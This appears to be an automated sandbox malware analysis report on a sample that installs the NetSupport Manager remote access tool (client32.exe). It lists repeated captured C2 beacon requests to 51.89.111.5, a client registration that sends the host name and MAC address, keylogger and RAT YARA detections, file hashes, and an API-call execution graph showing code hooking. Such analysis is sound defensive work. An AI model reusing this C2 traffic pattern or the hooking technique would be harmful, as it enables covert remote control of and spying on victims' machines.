                                                                                                              Nov 1, 2024 18:14:07.570282936 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.674268007 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.771244049 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.871288061 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.971332073 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.071358919 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.172241926 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.272273064 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.373271942 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.473337889 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.574238062 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.674247026 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:08.774347067 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.74997751.89.111.517716276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:14:39.414258003 CET214OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:44.417388916 CET398OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT=
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:44.518405914 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:44.618662119 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:44.719432116 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:44.820115089 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:44.920350075 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.022902012 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.121438026 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.222671032 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.322478056 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.422523022 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.526509047 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.624412060 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.728343964 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.824934959 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:45.925430059 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.025465012 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.125489950 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.326520920 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.686445951 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.786423922 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.886471033 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:46.988358974 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.088463068 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.189429045 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.290441990 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.389476061 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.490432978 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.504559994 CET603OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.590512037 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.691437006 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.793597937 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:47.808433056 CET1206OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLLPOST http://51.89.1 [TRUNCATED]
                                                                                                              Data Raw:
                                                                                                              Data Ascii:


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:13:11:00
                                                                                                              Start date:01/11/2024
                                                                                                              Path:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\hkpqXovZtS.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:3'338'375 bytes
                                                                                                              MD5 hash:885A317F0E6471B48210A165FA878AF7
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:13:11:03
                                                                                                              Start date:01/11/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
                                                                                                              Imagebase:0x650000
                                                                                                              File size:106'864 bytes
                                                                                                              MD5 hash:F76954B68CC390F8009F1A052283A740
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3709073509.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.3710467122.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000003.1569570475.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 30%, ReversingLabs
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              Target ID:11
                                                                                                              Start time:13:11:14
                                                                                                              Start date:01/11/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
                                                                                                              Imagebase:0x650000
                                                                                                              File size:106'864 bytes
                                                                                                              MD5 hash:F76954B68CC390F8009F1A052283A740
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.3%
                                                                                                                Dynamic/Decrypted Code Coverage:14.7%
                                                                                                                Signature Coverage:6.3%
                                                                                                                Total number of Nodes:1451
                                                                                                                Total number of Limit Nodes:65
                                                                                                                execution_graph 39828 2291068 39829 2291085 __cftof __vsnprintf 39828->39829 39834 2291688 GetModuleFileNameW 39829->39834 39833 22910e6 39835 229179b 39834->39835 39838 22916df 39834->39838 39869 229f3ee SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 39835->39869 39837 22917a0 39858 2291579 VirtualProtect 39838->39858 39840 229173d 39863 22918eb RtlInitializeCriticalSection 39840->39863 39842 2291742 39864 2291636 39842->39864 39845 2291636 130 API calls 39846 229176a 39845->39846 39847 2291636 130 API calls 39846->39847 39848 229177e 39847->39848 39849 2291636 130 API calls 39848->39849 39850 22910d9 39849->39850 39851 229f2be 39850->39851 39852 229f2c7 IsProcessorFeaturePresent 39851->39852 39853 229f2c6 39851->39853 39855 229f309 39852->39855 39853->39833 39969 229f2cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39855->39969 39857 229f3ec 39857->39833 39859 22915b6 39858->39859 39860 22915e9 39859->39860 39861 22915fb VirtualProtect 39859->39861 39860->39861 39862 2291616 __vsnprintf 39861->39862 39862->39840 39863->39842 39865 229163f GetModuleHandleA GetProcAddress 39864->39865 39866 2291665 GetProcAddress 39864->39866 39865->39866 39870 2291f17 39866->39870 39869->39837 39871 2291680 39870->39871 39872 2291f2c 39870->39872 39871->39845 39872->39871 39893 2291ac1 39872->39893 39874 2291f3f __cftof 39897 22919bf 39874->39897 39877 22920d4 RtlLeaveCriticalSection 39877->39871 39882 2291fad GetCurrentProcess VirtualProtectEx 39884 2291fdc VirtualProtectEx 39882->39884 39885 22920af 39882->39885 39883 22920b5 39934 2291afe GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 39883->39934 39887 2292094 FlushInstructionCache VirtualProtectEx 39884->39887 39890 2291ff5 39884->39890 39885->39883 39933 2291edb VirtualFree 39885->39933 39887->39885 39889 229205e 39892 2292067 FlushInstructionCache VirtualProtectEx 39889->39892 39890->39889 39891 2292046 FlushInstructionCache 39890->39891 39891->39889 39892->39887 39894 2291ad0 RtlInitializeCriticalSection 39893->39894 39895 2291af5 RtlEnterCriticalSection 39893->39895 39896 2291ae8 __cftof 39894->39896 39895->39874 39896->39895 39939 22921d1 39897->39939 39899 229f2be __startOneArgErrorHandling 5 API calls 39900 2291a78 39899->39900 39900->39877 39904 2291c53 6 API calls 39900->39904 39902 2291a5b 39902->39899 39903 22919ff 39903->39902 39945 2292105 80 API calls 39903->39945 39905 2291db8 GetCurrentThread SetThreadPriority 39904->39905 39906 2291cae 39904->39906 39907 2291dc9 39905->39907 39908 2291dce 39905->39908 39906->39905 39909 2291cb6 Thread32First 39906->39909 39910 2291afe 22 API calls 39907->39910 39911 229f2be __startOneArgErrorHandling 5 API calls 39908->39911 39912 2291db0 CloseHandle 39909->39912 39913 2291cd5 GetCurrentProcessId 39909->39913 39910->39908 39916 2291dde 39911->39916 39912->39905 39914 2291cee Thread32Next 39913->39914 39915 2291ce1 GetCurrentThreadId 39913->39915 39914->39913 39918 2291d06 __cftof 39914->39918 39915->39914 39917 2291ced 39915->39917 39927 2291de2 39916->39927 39917->39914 39918->39912 39919 2291d2d Thread32First 39918->39919 39920 2291d48 39919->39920 39921 2291da1 39919->39921 39922 2291d50 GetCurrentProcessId 39920->39922 39921->39912 39923 2291d89 Thread32Next 39922->39923 39924 2291d5c GetCurrentThreadId 39922->39924 39923->39921 39923->39922 39924->39923 39926 2291d68 39924->39926 39926->39923 39948 2291ba9 OpenThread 39926->39948 39928 2291df8 GetSystemInfo 39927->39928 39931 2291eaa 39927->39931 39929 2291e4d VirtualQuery 39928->39929 39928->39931 39930 2291e5f 39929->39930 39929->39931 39930->39929 39930->39931 39932 2291e7a VirtualAlloc 39930->39932 39931->39882 39931->39883 39932->39930 39932->39931 39933->39883 39935 2291b4c 39934->39935 39936 2291b27 ResumeThread CloseHandle 39934->39936 39959 22a1630 39935->39959 39936->39935 39936->39936 39940 22921e5 __cftof 39939->39940 39941 229221c 39940->39941 39946 22a1d7b 80 API calls 39940->39946 39943 2292228 39941->39943 39947 22a1d7b 80 API calls 39941->39947 39943->39903 39945->39903 39946->39941 39947->39943 39949 2291bd6 39948->39949 39955 2291c38 39948->39955 39950 2291bda Wow64SuspendThread 39949->39950 39949->39955 39952 2291c3a CloseHandle 39950->39952 39956 2291be6 39950->39956 39951 229f2be __startOneArgErrorHandling 5 API calls 39953 2291c51 39951->39953 39952->39955 39953->39926 39954 2291c26 Wow64GetThreadContext 39954->39955 39954->39956 39955->39951 39956->39954 39956->39955 39957 2291c0a ResumeThread 39956->39957 39957->39952 39958 2291c16 Sleep SuspendThread 39957->39958 39958->39954 39962 22a7a35 39959->39962 39961 2291b57 GetCurrentThread SetThreadPriority 39961->39877 39963 22a7a69 _free 39962->39963 39964 22a7a40 HeapFree 39962->39964 39963->39961 39964->39963 39965 22a7a55 39964->39965 39968 22a729d 14 API calls __dosmaperr 39965->39968 39967 22a7a5b GetLastError 39967->39963 39968->39967 39969->39857 39970 229110b NtCreateFile 39971 229114a 39970->39971 39972 229116a 39970->39972 39976 22917a1 39971->39976 39977 22917cc 39976->39977 39981 22917d8 __vsnprintf 39976->39981 39990 22a14fb 38 API calls 2 library calls 39977->39990 39979 22917df 39980 229f2be __startOneArgErrorHandling 5 API calls 39979->39980 39982 2291154 39980->39982 39981->39979 39983 2291898 39981->39983 39984 2291822 GetLongPathNameW 39981->39984 39982->39972 39989 2291908 RtlEnterCriticalSection RtlLeaveCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection 39982->39989 39992 229f3ee SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 39983->39992 39984->39983 39985 229184e 39984->39985 39985->39979 39991 22a14fb 38 API calls 2 library calls 39985->39991 39987 229189d 39989->39972 39990->39981 39991->39979 39992->39987 39993 22911ee 40002 22918a1 RtlEnterCriticalSection 39993->40002 39996 2291562 39998 229f2be __startOneArgErrorHandling 5 API calls 39996->39998 39997 2291255 NtReadFile 39997->39996 40001 22913e7 __vsnprintf __allrem 39997->40001 39999 2291573 39998->39999 40000 2291511 NtSetInformationFile 40000->39996 40001->39996 40001->40000 40003 22918df RtlLeaveCriticalSection 40002->40003 40004 22918bf 40002->40004 40003->39997 40004->40003 40005 46844e 40006 468453 40005->40006 40011 4d103c NtFreeVirtualMemory 40006->40011 40008 468464 40009 468469 RegCloseKey 40008->40009 40010 46847e 40009->40010 40011->40008 40012 